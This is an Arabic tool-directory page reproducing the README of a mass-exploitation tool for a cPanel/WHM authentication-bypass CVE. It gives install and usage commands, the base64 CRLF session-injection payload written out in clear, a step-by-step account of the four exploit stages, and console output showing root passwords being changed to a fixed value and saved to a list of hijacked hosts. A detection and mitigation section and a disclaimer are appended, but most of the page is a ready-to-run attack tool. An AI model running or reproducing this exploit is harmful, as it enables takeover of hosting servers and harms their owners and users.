Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41940 — ماسح ضخم وأداة استغلال جماعي لـ CVE-2026-41940 على cPanel/WHM، مصمم للتحقق الآلي من الأهداف وتنفيذ عالي السرعة متعدد الخيوط. | Kitploit
أدوات/GitHubGitHub/jenderal92/cve-2026-41940
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةالمصادقةالفريق الأحمرتطوير الحمولات
GitHubjenderal92/cve-2026-41940

CVE-2026-41940

ماسح ضخم وأداة استغلال جماعي لـ CVE-2026-41940 على cPanel/WHM، مصمم للتحقق الآلي من الأهداف وتنفيذ عالي السرعة متعدد الخيوط.

4411منذ 3 أشهرلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41940 - استغلال جماعي لتجاوز المصادقة في WHM/cPanel

43153

📋 الوصف

CVE-2026-41940 هي ثغرة حرجة لتجاوز المصادقة في WHM/cPanel تسمح للمهاجمين بتجاوز المصادقة والحصول على صلاحيات الجذر (root) على الخادم دون بيانات اعتماد صالحة. تستغل الثغرة حقن CRLF في آلية إدارة الجلسات لحقن معاملات جلسة ضارة.

توفر هذه الأداة قدرات الاستغلال الجماعي مع دعم تعدد الخيوط لاختبار أهداف متعددة في وقت واحد، مع كشف ذكي للنجاح وتصفية تلقائية للأهداف غير الصالحة.


🎯 الميزات الرئيسية

الميزةالوصف
✅ الاستغلال الجماعيمسح واستغلال أهداف متعددة من ملف قائمة
🚀 تعدد الخيوطعدد خيوط قابل للتكوين لفحص أسرع (الافتراضي: 15)
🔐 تغيير كلمة المرور تلقائياًتغيير كلمة مرور الجذر إلى Jenderal92 عند نجاح الاستغلال
🛡️ كشف ذكي للنجاحكشف تلقائي لتنسيقات استجابة WHM API المتنوعة
⚠️ تصفية أخطاء الترخيصاستبعاد الأهداف ذات أخطاء الترخيص غير الصالحة/غير القابلة للقراءة
📝 مخرجات منظمةحفظ النجاحات المؤكدة فقط بتنسيق domain:port|user|pass
🛡️ دعم SSL/TLSالتعامل مع الشهادات الذاتية التوقيع تلقائياً
🔄 إدارة الجلساتاستخراج الجلسات تلقائياً، حقن الكوكيز، ومعالجة الرموز المميزة
⏱️ التحكم في المهلةمهلة اتصال قابلة للتكوين (الافتراضي: 15 ثانية)
🔍 فحص ما قبل الاتصالالتحقق من توفر المنفذ قبل محاولة الاستغلال
📊 تقدم فوريعرض تفاصيل التقدم لكل مرحلة استغلال

📦 المتطلبات

  • Python 2.7 (مطلوب - غير متوافق مع Python 3.x)
  • اتصال بالإنترنت للوصول إلى الأهداف
  • حزم Python المطلوبة:
root@kitploit:~
pip install requests urllib3 futures

أو استخدم requirements.txt:

root@kitploit:~
requests==2.27.1
urllib3==1.26.18
futures==3.4.0

📥 التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940

# تثبيت التبعيات
pip install -r requirements.txt

# جعل الملف قابل للتنفيذ (لينكس/ماك)
chmod +x CVE-2026-41940.py

🚀 الاستخدام

1. إعداد ملف الأهداف

أنشئ ملف targets.txt بهدف واحد لكل سطر:

root@kitploit:~
https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com

ملاحظة: المنفذ 2087 هو منفذ WHM الافتراضي. إذا لم يُحدد، سيستخدم المنفذ 2087 تلقائياً. ستتم إضافة بادئة HTTP/HTTPS تلقائياً إذا كانت مفقودة.

2. تشغيل الأداة

الاستخدام الأساسي (الإعدادات الافتراضية)

root@kitploit:~
python2 CVE-2026-41940.py targets.txt

الاستخدام متعدد الخيوط

root@kitploit:~
# استخدام 5 خيوط متزامنة
python2 CVE-2026-41940.py targets.txt --threads 5

# استخدام 20 خيط للفحص الأسرع
python2 CVE-2026-41940.py targets.txt --threads 20

اسم مضيف مخصص

root@kitploit:~
# تجاوز رأس Host لجميع الأهداف
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10

مهلة مخصصة

root@kitploit:~
# تعيين المهلة إلى 30 ثانية للاتصالات البطيئة
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30

📊 وسائط سطر الأوامر

الوسيطةالوصفالقيمة الافتراضيةمطلوبة
list_fileملف يحتوي على قائمة الأهداف (واحد لكل سطر)-✅ نعم
--threadsعدد الخيوط المتزامنة15❌ لا
--hostnameتجاوز رأس Host لجميع الأهدافاكتشاف تلقائي❌ لا
--timeoutمهلة الاتصال بالثواني15❌ لا

📁 تنسيق المخرجات

ملف النتائج (res.txt)

يتم حفظ النجاحات المؤكدة فقط. تُستبعد الأهداف ذات أخطاء الترخيص، أو فشل تغيير كلمة المرور، أو مشاكل الاتصال تلقائياً.

التنسيق:

root@kitploit:~
domain:port|root|Jenderal92

مثال للمخرجات:

root@kitploit:~
www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92

السيناريوهات المستبعدة

لن يتم حفظ الأهداف التالية في res.txt:

  • أخطاء الترخيص (Cannot Read License File)
  • فشل تغيير كلمة المرور
  • انتهاء مهلة الاتصال أو الرفض
  • الأهداف المحدثة/التي لا تحتوي على WHM
  • بيانات اعتماد غير صحيحة أو فشل الجلسات

مخرجات وحدة التحكم

root@kitploit:~
$ python2 CVE-2026-41940.py targets.txt --threads 10

 CVE-2026-41940 bypass authentication - Mass Exploit

[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED

==================================================

[*] Checking target: 127.0.0.1
    Original input: 127.0.0.1
    Normalized: https://127.0.0.1:2087
    Port 2087: OPEN
    Testing connection... OK (HTTP 200)

[0] hostname = example.com
[1] minting a preauth session...
    session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
    HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.118.0.13"}
[*] attempting to change the root password
    passwd -> HTTP 200
    {
      "data": {
        "app": ["system"]
      },
      "metadata": {
        "output": {
          "raw": "Password for \"root\" has been changed."
        },
        "reason": "Password changed for user \"root\".",
        "version": 1,
        "command": "passwd",
        "result": 1
      }
    }
[+] Password change confirmed (metadata.result=1)
[+] ✓ Root password successfully changed to 'Jenderal92'!

[✓] SUCCESS & SAVED: 127.0.0.1:2087
    Saved to res.txt: 127.0.0.1:2087|root|Jenderal92

==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4

[+] Results saved to res.txt

Successfully exploited targets (password changed to Jenderal92):
  ✓ 127.0.0.1:2087

🔬 كيف يعمل الاستغلال

يتكون الاستغلال من 4 مراحل رئيسية مع تحقق ذكي:

المرحلة 1: جلسة ما قبل المصادقة

root@kitploit:~
[1] minting a preauth session...
  • إرسال طلب POST إلى /login/?login_only=1 ببيانات اعتماد غير صالحة
  • استرداد كوكي whostmgrsession من استجابة الخادم
  • استخراج قاعدة الجلسة بإزالة الجزء التالي ,<obhex>
  • يعطينا هذا تنسيق جلسة صالح للعمل به

المرحلة 2: هجوم حقن CRLF

root@kitploit:~
[2] sending the CRLF injection...
  • إرسال طلب GET مع رأس Authorization: Basic يحتوي على حمولة ضارة
  • الحمولة المشفرة Base64 تعني:
    root@kitploit:~
    root:x
    successful_internal_auth_with_timestamp=9999999999
    user=root
    tfa_verified=1
    hasroot=1
    
  • تقوم أحرف CRLF (\r\n) بحقن معاملات جلسة مزيفة
  • يخدع هذا الخادم ليعتقد أن المصادقة نجحت
  • يستجيب الخادم بـ HTTP 307 ورأس Location يحتوي على cp_security_token

المرحلة 3: نشر الجلسة

root@kitploit:~
[3] firing do_token_denied to propagate...
  • الوصول إلى نقطة النهاية /scripts2/listaccts باستخدام الكوكي المُعالج
  • تشغيل آلية do_token_denied في WHM
  • ينشر هذا معاملات الجلسة المحقونة في ذاكرة التخزين المؤقت للجلسات على الخادم
  • استجابة HTTP 401 مع رسالة "Token denied" تؤكد نجاح النشر

المرحلة 4: التحقق وتغيير كلمة المرور

root@kitploit:~
[4] verifying we're WHM root...
  • الوصول إلى /json-api/version للتحقق من الوصول على مستوى الجذر
  • استدعاء واجهة API /json-api/passwd لتغيير كلمة مرور الجذر إلى Jenderal92
  • كشف ذكي للنجاح عبر تنسيقات استجابة WHM API المتنوعة:
    • {"metadata": {"result": 1}} (cPanel v11.118+)
    • {"status": 1} (الإصدارات الأقدم)
    • {"result": [{"status": 1}]} (تنسيق قديم)
    • رسائل نجاح نصية

التصفية التلقائية

تقوم الأداة تلقائياً باستبعاد:

  • أخطاء الترخيص: {"status": 0, "statusmsg": "Cannot Read License File"}
  • فشل تغيير كلمة المرور: عندما تعيد API رمز النجاح لكن كلمة المرور لم تتغير
  • مشاكل الاتصال: انتهاء المهلة، اتصالات مرفوضة، مضيفين غير قابلين للوصول

🛡️ الكشف والتخفيف

مؤشرات الاختراق (IOCs)

المؤشرالوصف
كوكي whostmgrsession شاذأنماط كوكي غير عادية دون مصادقة صحيحة
أحرف CRLF في الرؤوسكشف تسلسل \r\n في رؤوس HTTP
الوصول إلى /scripts2/listacctsوصول غير مصرح به إلى هذا المسار
كلمة المرور Jenderal92تسجيل دخول ناجح باستخدام كلمة المرور هذه تحديداً
تسريب رمز cpsessرمز أمان مرئي في رأس Location
فشل تسجيل الدخول يتبعه نجاحPOST إلى /login/?login_only=1 بكلمة مرور خاطئة، ثم وصول مميز

السجلات التي يجب مراقبتها

root@kitploit:~
# سجل وصول WHM
/usr/local/cpanel/logs/access_log

# سجل أخطاء cPanel
/usr/local/cpanel/logs/error_log

# سجل المصادقة
/var/log/secure

# رسائل النظام
/var/log/messages

خطوات التخفيف

  1. تحديث WHM/cPanel إلى أحدث إصدار مصحح فوراً

    root@kitploit:~
    /usr/local/cpanel/scripts/upcp
    
  2. تفعيل المصادقة الثنائية (2FA) لجميع الحسابات، خاصة الجذر

    root@kitploit:~
    WHM → Security Center → Two-Factor Authentication
    
  3. تقييد الوصول إلى WHM باستخدام القائمة البيضاء للـ IP

    root@kitploit:~
    WHM → Security Center → Host Access Control
    
  4. مراقبة سجلات الوصول بانتظام للأنماط المشبوهة

    root@kitploit:~
    tail -f /usr/local/cpanel/logs/access_log | grep -E "(listaccts|passwd|login_only)"
    
  5. تغيير جميع كلمات المرور إذا كان هناك اشتباه بالاختراق

  6. استخدام قواعد جدار الحماية لتقييد الوصول إلى المنفذ 2087

    root@kitploit:~
    # السماح فقط للـ IPs الموثوقة
    iptables -A INPUT -p tcp --dport 2087 -s YOUR_TRUSTED_IP -j ACCEPT
    iptables -A INPUT -p tcp --dport 2087 -j DROP
    
    # أو استخدام جدار الحماية CSF/LFD
    csf -a YOUR_TRUSTED_IP
    
  7. تنفيذ قواعد WAF لكشف محاولات حقن CRLF

  8. مراجعات أمنية دورية لتثبيتات WHM/cPanel


📝 أمثلة استخدام في سيناريوهات مختلفة

السيناريو 1: اختبار هدف واحد

root@kitploit:~
echo "https://myserver.com:2087" > my_server.txt
python2 CVE-2026-41940.py my_server.txt --threads 1

السيناريو 2: تدقيق خوادم متعددة

root@kitploit:~
python2 CVE-2026-41940.py all_servers.txt --threads 20 --timeout 20

السيناريو 3: شبكة بطيئة/مسافات طويلة

root@kitploit:~
python2 CVE-2026-41940.py servers.txt --threads 5 --timeout 45

السيناريو 4: اسم مضيف مخصص خلف وكيل/موازن تحميل

root@kitploit:~
python2 CVE-2026-41940.py servers.txt --hostname internal.cpanel.server --threads 10

السيناريو 5: أهداف بمنافذ مختلطة

root@kitploit:~
# targets.txt يمكن أن يحتوي على تنسيقات متنوعة:
https://server1.com:2087
http://server2.com:2087
server3.com:2087
127.0.0.1:2087
10.0.0.50

# سيتم تطبيع الجميع تلقائياً
python2 CVE-2026-41940.py targets.txt --threads 15

⚙️ استكشاف الأخطاء وإصلاحها

خطأ: "module 'urllib' has no attribute 'urlsplit'"

المشكلة: استخدام Python 3 بدلاً من Python 2.7
الحل: هذه الأداة تتطلب Python 2.7 تحديداً.

root@kitploit:~
# التحقق من إصدار Python
python2 --version  # يجب أن يظهر Python 2.7.x

# التشغيل باستخدام python2 صراحةً
python2 CVE-2026-41940.py targets.txt

خطأ: "Connection refused - target unreachable"

المشكلة: الهدف غير متصل أو جدار الحماية يمنع الاتصال
الحل:

root@kitploit:~
# اختبار يدوياً
telnet target.com 2087
nmap -p 2087 target.com
curl -k https://target.com:2087

خطأ: "/login didn't issue a whostmgrsession cookie"

المشكلة: قد يكون الهدف مُحدثاً أو لا يعمل عليه WHM
الحل:

  • تحقق من أن الهدف يعمل عليه WHM/cPanel
  • تحقق من إمكانية الوصول إلى الهدف عبر المتصفح على https://target:2087
  • ربما تم تطبيق التصحيح لـ CVE-2026-41940 على الهدف بالفعل

أداء فحص بطيء

الحل: ضبط عدد الخيوط والمهلة

root@kitploit:~
# لأهداف كثيرة مع اتصال جيد
python2 CVE-2026-41940.py targets.txt --threads 30 --timeout 10

# للاتصالات غير الموثوقة
python2 CVE-2026-41940.py targets.txt --threads 5 --timeout 45

أخطاء الترخيص في المخرجات

ملاحظة: الأهداف التي تظهر Cannot Read License File تُستبعد تلقائياً من res.txt. هذا سلوك متوقع لأن تغيير كلمة المرور لن يعمل على تثبيتات WHM غير المرخصة.


🔧 تكوين متقدم

تعديل الحمولة المخصصة

يمكنك تعديل PAYLOAD_B64 لمعاملات جلسة مخصصة:

root@kitploit:~
import base64

# حمولة مخصصة
payload = """root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1"""

encoded = base64.b64encode(payload.encode())
print(encoded)

كلمة مرور مخصصة

تغيير كلمة المرور في دالة do_passwd() (السطر ~280):

root@kitploit:~
{"user": "root", "password": "YourCustomPassword123"}

تعديل كشف النجاح

يمكن تعديل دالة do_passwd() لكشف تنسيقات استجابة WHM مخصصة:

root@kitploit:~
# إضافة نمط مخصص في do_passwd()
if 'your_custom_success_string' in (r.text or '').lower():
    return "success"

🤝 المساهمة

المساهمات مرحب بها! يرجى اتباع هذه الخطوات:

  1. عمل Fork للمستودع
  2. إنشاء فرع ميزة (git checkout -b feature/AmazingFeature)
  3. إرسال التغييرات (git commit -m 'Add some AmazingFeature')
  4. رفع الفرع (git push origin feature/AmazingFeature)
  5. فتح طلب سحب (Pull Request)

إرشادات التطوير

  • الحفاظ على التوافق مع Python 2.7
  • الاختبار مع إصدارات مختلفة من WHM/cPanel
  • إضافة معالجة مناسبة للأخطاء
  • تحديث الوثائق للميزات الجديدة

⭐ تاريخ النجوم

إذا كانت هذه الأداة مفيدة لأبحاثك الأمنية، يرجى منحها ⭐ على GitHub!

Star History Chart


❗ الأسئلة الشائعة

س: هل يمكن كشف هذه الأداة؟
ج: نعم، هذه الأداة تترك آثاراً في سجلات وصول WHM/cPanel. استخدمها فقط بتفويض مناسب ولاختبار أمني مشروع.

س: كم من الوقت يستغرق الاستغلال؟
ج: حوالي 5-15 ثانية لكل هدف حسب زمن استجابة الشبكة والخادم.

س: هل تتطلب صلاحية جذر مسبقة؟
ج: لا، هذا الاستغلال يعمل بالكامل من الخارج دون أي مصادقة.

س: هل تعمل هذه الأداة على ويندوز؟
ج: نعم، طالما تم تثبيت Python 2.7 وتكوينه بشكل صحيح.

س: هدفي يستخدم منفذاً مختلفاً، ماذا أفعل؟
ج: حدد المنفذ في رابط الهدف: https://target.com:2083 لـ cPanel أو أي منفذ مخصص.

س: لماذا لا يتم حفظ بعض الأهداف في res.txt رغم نجاح الاستغلال؟
ج: الأداة تحفظ الأهداف التي تم تغيير كلمة المرور فيها بنجاح فقط. الأهداف ذات أخطاء الترخيص، أو فشل تغيير كلمة المرور، أو مشاكل أخرى تُستبعد حتى لو نجح تجاوز المصادقة.

س: ما إصدارات WHM/cPanel المعرضة للخطر؟
ج: الإصدارات السابقة لتصحيح CVE-2026-41940. تحقق من سجل تغييرات cPanel للإصدار المُصحح.


📌 ملاحظات مهمة

  • ✅ هذه الأداة تغير كلمة مرور الجذر إلى Jenderal92 عند نجاح الاستغلال
  • 📡 منفذ WHM الافتراضي هو 2087 (يُستخدم تلقائياً إذا لم يُحدد)
  • 🔒 تم تعطيل التحقق من شهادة SSL لدعم الشهادات الذاتية التوقيع
  • 💾 يتم حفظ النجاحات المؤكدة فقط (تم تغيير كلمة المرور) في res.txt
  • ⚠️ أخطاء الترخيص وفشل تغيير كلمة المرور يتم تصفيتها تلقائياً
  • 🔄 كل تشغيل ينشئ ملف res.txt جديداً (يتم حذف النتائج القديمة)
  • 🌐 تتم إضافة بادئة HTTP/HTTPS تلقائياً إذا كانت مفقودة من الأهداف
  • 🧵 عدد الخيوط الافتراضي هو 15، ويمكن تعديله حسب قدرات النظام

أنشئ لأغراض البحث الأمني التعليمي
استخدم بمسؤولية، كن قانونياً، كن أخلاقياً


⚠️ إخلاء المسؤولية

⚠️ تحذير هام!

تم إنشاء هذه الأداة حصرياً من أجل:

  • ✅ الأغراض التعليمية والبحث الأمني
  • ✅ اختبار الاختراق المصرح به
  • ✅ تقييمات الأمان على الأنظمة التي تملكها
  • ✅ التحقق من الثغرات بإذن كتابي

الاستخدامات المحظورة تماماً:

  • ❌ الوصول إلى أنظمة دون إذن صريح
  • ❌ أي شكل من أشكال الأنشطة غير القانونية
  • ❌ إجراءات ضارة أو التسبب في ضرر للأنظمة
  • ❌ الوصول غير المصرح به إلى أي أنظمة حاسوبية
  • ❌ انتهاك أي قوانين محلية أو ولاية أو اتحادية

لا يتحمل المؤلفون أي مسؤولية أو التزام تجاه أي سوء استخدام أو ضرر أو عواقب ناتجة عن استخدام هذه الأداة. باستخدام هذه الأداة، فإنك توافق على استخدامها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.

إذا تابعت، فإنك تقر بأن:

  1. لديك الإذن لاختبار الأنظمة المستهدفة
  2. أنت تفهم الآثار القانونية للوصول غير المصرح به
  3. ستلتزم بجميع القوانين واللوائح المعمول بها
  4. المؤلفون ليسوا مسؤولين عن أفعالك

المزيد من إخلاء المسؤولية يمكنك رؤيته على غلاف Jenderal92. يمكنك التحقق منه هنا !!!

تنزيل الأداة